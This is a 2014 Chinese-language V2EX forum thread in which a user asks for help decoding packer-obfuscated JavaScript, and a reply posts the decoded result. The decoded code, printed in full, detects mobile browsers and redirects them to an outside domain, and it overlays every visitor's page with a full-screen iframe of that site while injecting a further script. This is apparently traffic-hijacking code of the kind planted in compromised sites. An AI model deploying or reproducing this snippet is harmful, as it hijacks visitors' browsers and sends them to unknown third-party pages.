V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
Execution
V2EX  ›  问与答

求帮解密这段混淆加密 js,我试了各种方法都不行。。。。

  •  
  •   Execution · 2014-09-24 22:38:03 +08:00 · 3467 次点击
    这是一个创建于 3699 天前的主题,其中的信息可能已经有所发展或是发生改变。
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('2H(1C(p,a,c,k,e,d){e=1C(c){1D(c<a?"":e(2y(c/a)))+((c=c%a)>35?1I.2z(c+29):c.2w(36))};1E(!\'\'.1G(/^/,1I)){1H(c--)d[e(c)]=k[c]||e(c);k=[1C(e){1D d[e]}];e=1C(){1D\'\\\\w+\'};c=1};1H(c--)1E(k[c])p=p.1G(1F 2j(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);1D p}(\'c a=["H","K","A","D","B","1b","1e","1f","1c","1d","Q","O","U","T","W","V","S","P","R","f://g.h.e/k/","f://g.h.e/k/","f://g.h.e/k/","Y","X","<s>1a,Z{q:d%;o:d%;z:y;E:0;C:0;}</s><l r=\\\'","\\\' q=\\\\"d%\\\\" o=\\\\"d%\\\\" L=\\\\"N\\\\" M=\\\\"0\\\\" J=\\\\"0\\\\" G=\\\\"0\\\\" F=\\\\"I\\\\"></l>","1z","<p 1B=1A/1w r=1v.1y></p>","1x"];c j=n t(a[0],a[1],a[2],a[3],a[4],a[5],a[6],a[7],a[8],a[9],a[10],a[11],a[12],a[13]);c x=1k[a[15]][a[14]]();c m=1l;1m(c i=0;i<j[a[16]];i++){1j(x[a[17]](j[i])!=-1){m=1g;1h[a[18]]=a[19];1i}}b=n t();b[0]=a[v];b[1]=a[v];b[2]=a[1n];i=w[a[1s]]()*b[a[16]];i=w[a[1t]](i);u[a[1u]](a[1r]+b[i]+a[1o]);u[a[1p]](a[1q]);\',2i,1J,\'||||||||||2l|2k|1K|1J|2h|2e|2d|2g||2f|2s|2r|2u|1F|2t|2q|2n|2m|2p|2o|2c|20|1P|1S|1R|1M|1O|1Y|2b|2a|1Q|1U|1T|1W|1V|1X|1Z|1N|1L|2v|2U|2T|2V|2X|2W|2P|2O|2Q|2S|2R|33|37|||||||||||2Z|34|31|30|32|2Y|2C|2B|2E|1E|2D|2A|2x|21|25|28|27|24|22|23|26|2L|2K|2N|2M|2J|2G|2F\'.2I(\'|\'),0,{}))(1C(){1K m=\'m\'})',62,194,'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||function|return|if|new|replace|while|String|100|var|border|overflow|frameborder|ipad|Math|margin|hidden|browser|marginheight|scrolling|yes|iphone|marginwidth|mobile|ipod|||||||||||android|padding|document|www|http|mobileAgent|yogart|cn|62|RegExp|url|arr|src|width|Array|style|script|iframe|lbfz1|height|isMobile|no|toString|for|parseInt|fromCharCode|false|location|true|navigator|break|type|text|eval|split|write|javascript|baidu|js|writeln|ucweb|skyfire|userAgent|floor|toLowerCase|indexOf|lg|nokia|length|href|incognito|html|bada|webmate|webos|random|blackberry|||body'.split('|'),0,{}))
    5 条回复    2014-09-25 09:39:11 +08:00
    Execution
        1
    Execution  
    OP
       2014-09-24 22:39:45 +08:00
    搞不定了。。。
    xiaozi
        2
    xiaozi  
       2014-09-24 22:40:38 +08:00
    使用 http://tool.lu/js
    第一次可以直接解密
    第二次要将后面的那句去掉后点击解密

    var arr = ["iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire", "toLowerCase", "userAgent", "length", "indexOf", "href", "http://www.yogart.cn/lbfz1/", "http://www.yogart.cn/lbfz1/", "http://www.yogart.cn/lbfz1/", "random", "floor", "<style>html,body{width:100%;height:100%;overflow:hidden;margin:0;padding:0;}</style><iframe src='", "' width=\"100%\" height=\"100%\" frameborder=\"no\" border=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"yes\"></iframe>", "write", "<script type=text/javascript src=baidu.js></script>", "writeln"];
    var mobileAgent = new Array(arr[0], arr[1], arr[2], arr[3], arr[4], arr[5], arr[6], arr[7], arr[8], arr[9], arr[10], arr[11], arr[12], arr[13]);
    var browser = navigator[arr[15]][arr[14]]();
    var isMobile = false;
    for (var i = 0; i < mobileAgent[arr[16]]; i++) {
    if (browser[arr[17]](mobileAgent[i]) != -1) {
    isMobile = true;
    location[arr[18]] = arr[19];
    break
    }
    }
    url = new Array();
    url[0] = arr[20];
    url[1] = arr[20];
    url[2] = arr[21];
    i = Math[arr[22]]() * url[arr[16]];
    i = Math[arr[23]](i);
    document[arr[26]](arr[24] + url[i] + arr[25]);
    document[arr[28]](arr[27]);

    (function() {
    var m = 'm'
    })
    Execution
        3
    Execution  
    OP
       2014-09-24 22:50:35 +08:00
    @xiaozi 谢谢了,之前没去掉后面那句,一直解不了。
    yyfearth
        4
    yyfearth  
       2014-09-25 01:35:49 +08:00
    一看就知道是用packer做的
    holmesabc
        5
    holmesabc  
       2014-09-25 09:39:11 +08:00
    这难道就是那个传说的iphone抢机的脚本
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2608 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 27ms · UTC 10:40 · PVG 18:40 · LAX 02:40 · JFK 05:40
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.